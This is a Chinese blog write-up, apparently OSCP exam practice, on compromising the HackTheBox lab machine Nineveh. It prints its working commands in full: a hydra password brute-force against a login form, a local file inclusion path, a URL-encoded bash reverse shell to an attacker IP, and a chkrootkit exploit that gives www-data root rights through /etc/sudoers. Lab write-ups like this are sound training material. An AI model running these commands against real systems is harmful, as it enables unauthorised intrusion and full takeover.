OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

Ethan医生1周前靶场24

信息收集

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)


image.png



nmap -sU --top-ports 100 10.129.143.34(扫描UDP)

image.png

http://10.129.143.34/info.php

/var/www/html/info.php

image.png

gobuster dir -u http://10.129.143.34/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png


gobuster dir -u http://10.129.143.34/department -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png

hydra -l admin -P /usr/share/wordlists/my_list/rockyou-top15000.txt 10.129.143.34 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V -f

login: admin   password: 1q2w3e4r5t

image.png


image.png

应该跟文件读取有关系 先试试看443端口,

ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR


image.png

 gobuster dir -u https://nineveh.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k

image.png

看到有DB,https://nineveh.htb/db/

image.png

爆破密码:

password123

image.png

首先创建一个数据库hack。php,然后表随便创建一个,然后插入一个

image.png


然后去到那个lfi的地方进行访问

http://10.129.143.34/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php


http://10.129.143.34/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php&ipp=/bin/bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.31/3334%200%3E%261%27

(需要注意提交参数的时后要用URL编码& = %26)

image.png

透過pspy32可以發現有chkrootkit這隻成是在跑,chkrootkit是一支可以檢查程式弱點及漏洞的東西,但是他自己就是漏洞。



发现可以使用https://vk9-sec.com/chkrootkit-0-49-local-privilege-escalation-cve-2014-0476/?source=post_page-----8023cae4f4cd---------------------------------------

chkrootkit

echo 'mkdir /tmp/vry4n' > /tmp/update
chmod 777 /tmp/update
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update


sudo su

image.png


标签: OSCP

相关文章

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。